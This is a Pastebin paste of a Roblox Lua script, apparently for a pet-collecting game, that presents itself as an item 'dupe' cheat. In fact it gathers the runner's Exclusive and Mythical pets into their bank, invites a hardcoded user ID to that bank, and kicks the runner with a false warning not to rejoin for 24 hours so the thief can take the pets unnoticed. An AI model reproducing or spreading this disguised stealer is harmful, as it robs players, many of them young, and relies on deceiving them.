Advertisement
Egorikusa

Untitled

Jul 29th, 2022
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.53 KB | None | 0 0
  1. local args = { [1] = "Use Dupe", [2] = "All" }
  2. game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
  3. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  4. lib.Message.New("You are using script from nedo#5024" , "Creator: nedo#5024" , "Not looking for spam");
  5.  
  6. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  7. local mybanks = lib.Network.Invoke("get my banks")
  8. local PetsList = {}
  9. for i,v in pairs(lib.Save.Get().Pets) do
  10. local v2 = lib.Directory.Pets[v.id];
  11. if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Mythical" and v.r then
  12. table.insert(PetsList, v.uid);
  13. end
  14. end
  15. local request, request2 = lib.Network.Invoke("Bank Deposit", mybanks[1]['BUID'], PetsList);
  16. if request then
  17. task.spawn(lib.Network.Invoke,'request world', 'Fantasy')
  18. warn("MADE BY nedo#5024")
  19. else
  20. end
  21.  
  22. if lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], 1410249886) then
  23. game.Players.LocalPlayer:Kick("Don't join the game for the next 24 hrs to stop the pets from getting deleted") lib.Message.New("")
  24. else
  25. game.Players.LocalPlayer:Kick("Don't join the game for the next 24 hrs to stop the pets from getting deleted")
  26. function comma_value(amount)
  27.  
  28. local formatted = amount
  29.  
  30. while true do
  31.  
  32. formatted, k = string.gsub(formatted, "^(-?%d+)(%d%d%d)", '%1,%2')
  33.  
  34. if (k == 0) then
  35.  
  36. break
  37.  
  38. end
  39.  
  40. end
  41.  
  42. return formatted
  43.  
  44. end
  45. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement